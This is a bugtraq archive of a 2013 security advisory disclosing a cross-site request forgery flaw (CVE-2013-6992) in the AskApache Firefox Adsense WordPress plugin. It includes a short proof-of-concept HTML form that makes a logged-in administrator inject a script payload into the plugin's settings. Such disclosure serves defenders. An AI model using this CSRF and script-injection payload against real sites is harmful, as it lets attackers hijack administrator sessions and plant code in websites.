[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    =?UTF-8?Q?=D0=A1ross-Site_Request_Forgery_=28CSRF=29_in_AskApach?= =?UTF-8?Q?e_Firefox_Adsense_Wordp
From:       High-Tech Bridge Security Research <advisory () htbridge ! com>
Date:       2013-12-26 11:09:13
Message-ID: 20131226110913.F009F2C54882 () htbridge ! ch
[Download RAW message or body]

Advisory ID: HTB23188
Product: AskApache Firefox Adsense Wordpress plugin
Vendor: AskApache
Vulnerable Version(s): 3.0 and probably prior
Tested Version: 3.0
Advisory Publication:  December 5, 2013  [without technical details]
Vendor Notification: December 5, 2013 
Public Disclosure: December 26, 2013 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2013-6992
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in AskApache Firefox \
Adsense Wordpress plugin, which can be exploited to perform Сross-Site Request \
Forgery (CSRF) attacks.


1) Сross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin: \
CVE-2013-6992

The vulnerability exists due to insufficient verification of the HTTP request origin \
in "/wp-admin/options-general.php" script. A remote attacker can trick a logged-in \
administrator to visit a specially crafted page with CSRF exploit, inject and execute \
arbitrary HTML and script code in administrator's browser in context of vulnerable \
website. 

The exploitation example below injects JavaScript code, which uses the "alert()" \
function to display "immuniweb" word:


<form action="http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php" \
method="post" name="main"> <input type="hidden" name="aafireadcode"  \
value='<script>alert("immuniweb");</script>'> <input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------


Solution:

Disable the vulnerable plugin. 

On 2013-12-06 vendor replied to our notification that he will not support the plugin \
anymore, and proposed to remove the vulnerable plugin as the official solution. The \
vendor has also taken steps to remove this plugin from WordPress.org.


-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23188 - https://www.htbridge.com/advisory/HTB23188 - \
Сross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin. [2] \
AskApache Firefox Adsense Wordpress plugin - \
http://wordpress.org/plugins/askapache-firefox-adsense/ - Displays a Google Adsense \
Ad for Firefox only for non-firefox users. [3] Common Vulnerabilities and Exposures \
(CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE ® \
is a dictionary of publicly known information security vulnerabilities and exposures. \
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers \
and security practitioners, CWE is a formal list of software weakness types. [5] \
ImmuniWeb ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary \
web application security assessment solution with SaaS delivery model that combines \
manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.


[prev in list] [next in list] [prev in thread] [next in thread]